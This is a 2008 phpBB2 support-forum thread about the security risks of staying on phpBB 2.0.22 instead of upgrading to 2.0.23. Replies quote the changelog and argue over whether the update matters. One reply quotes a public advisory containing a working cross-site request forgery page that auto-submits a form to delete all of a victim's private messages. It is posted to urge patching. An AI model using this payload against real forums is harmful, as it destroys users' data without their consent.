phpBB2Refugees.com Logo
Not affiliated with or endorsed by the phpBB Group

Register •  Login 

Continue the legacy...

Welcome to all phpBB2 Refugees!Wave Smilie

This site is intended to continue support for the legacy 2.x line of the phpBB2 bulletin board package. If you are a fan of phpBB2, please, by all means register, post, and help us out by offering your suggestions. We are primarily a community and support network. Our secondary goal is to provide a phpBB2 MOD Author and Styles area.

Risks of running phpBB 2.0.22


 
Search this topic... | Search General Support... | Search Box
Register or Login to Post    Index » General Support  Previous TopicPrint TopicNext Topic
Author Message
Rodoom
Board Member



Joined: 30 Dec 2008

Posts: 3



PostPosted: Tue Dec 30, 2008 1:39 am 
Post subject: Risks of running phpBB 2.0.22

Hello,

I have been running a phpBB2 Plus forum (from here: http://www.phpbb2.de/dload.php?action=file&file_id=828) for almost 6 years now, however that project died some months ago and they stopped updating the package.
So my problem (and question) is: which security problems could I be facing for running a phpBB 2.0.22 installation instead of a phpBB 2.0.23?

I would LOVE to upgrade to 2.0.23, however I donīt have enough knowledge about the plus package in order to do the manual code changes without affecting all the preinstalled mods.

Thank you.
Back to top
espicom
Board Member



Joined: 24 Nov 2008

Posts: 55
Location: Woodstock, IL


flag
PostPosted: Tue Dec 30, 2008 2:29 am 
Post subject: Re: Risks of running phpBB 2.0.22

The phpBB Plus people should have come up with their own version of the update by now, it's been out for some time.

Personally, I'd say the risk is not that high to the board; more and more of the changes I see are to fix problems with certaIn browsErs. I'd be more concerned with the fact that you haven't seen an update package yet, since a lot of MODs go through security issues over time, and more MODs means more things to be watching/fixing.

(and no, I haven't applied the .23 patches to my boards, either)
Back to top
Rodoom
Board Member



Joined: 30 Dec 2008

Posts: 3



PostPosted: Tue Dec 30, 2008 2:46 am 
Post subject: Re: Risks of running phpBB 2.0.22

Yes, I know... however the person in charge of the project stopped contributing to it, and since I donīt have the time/knowledge to perform the individual mod upgrades as well as the phpBB one, we were left in the dark with out phpBB Plus installations.

As a matter of fact I am looking forward for a way to convert my forums to some other "all in one" project, or even phpBB 3, but I havenīt seen any similar mods for it similar to the ones I care the most (ezPortal and smartor gallery album), including some sort of "migration" tool from the data I have right now.

So far my forums have survived, so I am guessing either no one has had interest in trying to hack my boards or they are still somewhat secure, but this is not a desirable situation and I am looking for a fix.

Thanks anyway icon_smile.gif
Back to top
~Cowboy~
Board Member



Joined: 08 Dec 2008

Posts: 297
Location: Chicago


flag
PostPosted: Tue Dec 30, 2008 3:22 am 
Post subject: Re: Risks of running phpBB 2.0.22

You should make a backup of you board and try to do the manual install of .23 yourself. Its really not all that hard to do if you follow the instructions carefully. If you screw it up just use the backup you just made to put the board back the way it was. icon_wink.gif
_________________
Image link
We are not refugees we are trail blazers. icon_wink.gif
Back to top
Ram
Board Member



Joined: 23 Dec 2008

Posts: 100
Location: Somewhere over the rainbow


flag
PostPosted: Tue Dec 30, 2008 8:54 am 
Post subject: Re: Risks of running phpBB 2.0.22

Actually there is no more risk in running with .0.22, this udapte (.0.23) was just smoke and mirrors.
Back to top
cherokee red
Board Member



Joined: 19 Nov 2008

Posts: 19
Location: Airdrie, UK


flag
PostPosted: Tue Dec 30, 2008 9:39 am 
Post subject: Re: Risks of running phpBB 2.0.22

Ram wrote:
Actually there is no more risk in running with .0.22, this udapte (.0.23) was just smoke and mirrors.

Quote:
* [Fix] Correctly re-assign group moderator on user deletion (Bug #280)
* [Fix] Deleting a forum with multiple polls included (Bug #6740)
* [Fix] Fixed postgresql query for obtaining group moderator in groupcp.php (Bug #6550)
* [Fix] Selected field on first entry by default for font size within posting_body.tpl (Bug #7124)
* [Fix] Adjusted maxlength parameters in admin/styles_edit_body.tpl (Bug #81)
* [Fix] Fixed html output in make_forum_select if no forums present (Bug #436)
* [Fix] Fixed spelling error(s) in lang_admin.php (Bug #7172, #6978)
* [Fix] Correctly display censored words in admin panel (Bug #12271)
* [Fix] Do not allow soft hyphen \xAD in usernames (reported by Bander00)
* [Fix] Fixed the group permission system's use of array access
* [Fix] Simple group permissions now work properly
* [Fix] Fix inability to export smilies (Bug #2265)
* [Fix] Fixing some problems with PHP5 and register_long_arrays off
* [Sec] Fix possible XSRF Vulnerability in private messaging and groups handling

_________________
phpBB MODs // My Music // Romance Designs :: coming soon
Former phpBB Moderator
Are you a musician in the Glasgow area interested in acoustic events? The ArtBox
Back to top
Ram
Board Member



Joined: 23 Dec 2008

Posts: 100
Location: Somewhere over the rainbow


flag
PostPosted: Tue Dec 30, 2008 10:30 am 
Post subject: Re: Risks of running phpBB 2.0.22

Because you think it was all corrected in .0.23? There is security issues too in the actual version.

You are funny @ bb.com icon_lol.gif
Back to top
Sylver Cheetah 53
Board Member



Joined: 17 Dec 2008

Posts: 426
Location: Milky Way


flag
PostPosted: Tue Dec 30, 2008 10:40 am 
Post subject: Re: Risks of running phpBB 2.0.22

In phpBB 2.0.22 you can delete all pm's of someone, according to this:
Code:
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability
by NBBN Type: Cross-Site Request Forgery
Founded: December 2007
################################################################


An attacker can send a link via pm to a site with the follow html code to a
victim and all victim's pm's are going to be deleted when he click the link.
######Code##########################################################

<html>
<head>
</head>
<body onLoad=javascript:document.xsrf.submit()>

<form action="http://[site]/phpBB2/privmsg.php?folder=inbox"; method="post"
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">

</body>
</html>

You must update to phpBB 2.0.23. Try doying manual code changes to your board, running on your computer, and see how it goes. icon_wink.gif

_________________
Image link
My Forum || My Blog

phpBB2 forever! icon_smile.gif
Back to top
cherokee red
Board Member



Joined: 19 Nov 2008

Posts: 19
Location: Airdrie, UK


flag
PostPosted: Tue Dec 30, 2008 12:09 pm 
Post subject: Re: Risks of running phpBB 2.0.22

Ram wrote:
Because you think it was all corrected in .0.23? There is security issues too in the actual version.

You are funny @ bb.com icon_lol.gif

My quote is directly from Meik's Announcement Post for the release of 2.0.23 icon_wink.gif

_________________
phpBB MODs // My Music // Romance Designs :: coming soon
Former phpBB Moderator
Are you a musician in the Glasgow area interested in acoustic events? The ArtBox
Back to top
Jim_UK
Board Member



Joined: 19 Nov 2008

Posts: 544
Location: North West UK


flag
PostPosted: Tue Dec 30, 2008 3:28 pm 
Post subject: Re: Risks of running phpBB 2.0.22

Was that the vulnerability were you had to be logged in as Admin to be able to do it?
Quote:
Fix possible XSRF Vulnerability in private messaging and groups handling
My bolding of the word possible.
If that is the case then it may not be such of an issue.
I would however (and did) do the update as if someone were to take over the patching of phpBB2 for security reasons then surely their starting point would be with 2.0.23 and not earlier versions. (they were already done)

Jim
Back to top
Rodoom
Board Member



Joined: 30 Dec 2008

Posts: 3



PostPosted: Wed Dec 31, 2008 11:41 pm 
Post subject: Re: Risks of running phpBB 2.0.22

Thanks all for your insight. I will try to patch the forum using an offline installation and then, if everything *seems* to go ok, release a beta version on the live server... after a week or two I will assume everything went ok and leave it upgraded.

If I succeed I will post the changes done here.

thanks.
Back to top
Display posts from previous:   
Register or Login to Post    Index » General Support  Previous TopicPrint TopicNext Topic
Page 1 of 1 All times are GMT
 
Jump to:  

Index • About • FAQ • Rules • Privacy • Search •  Register •  Login 
Not affiliated with or endorsed by the phpBB Group
Powered by phpBB2 © phpBB Group
Generated in 0.0131 seconds using 15 queries. (SQL 0.0019 Parse 0.0003 Other 0.0108)
phpBB Customizations by the phpBBDoctor.com
Template Design by DeLFlo and MomentsOfLight.com Moments of Light Logo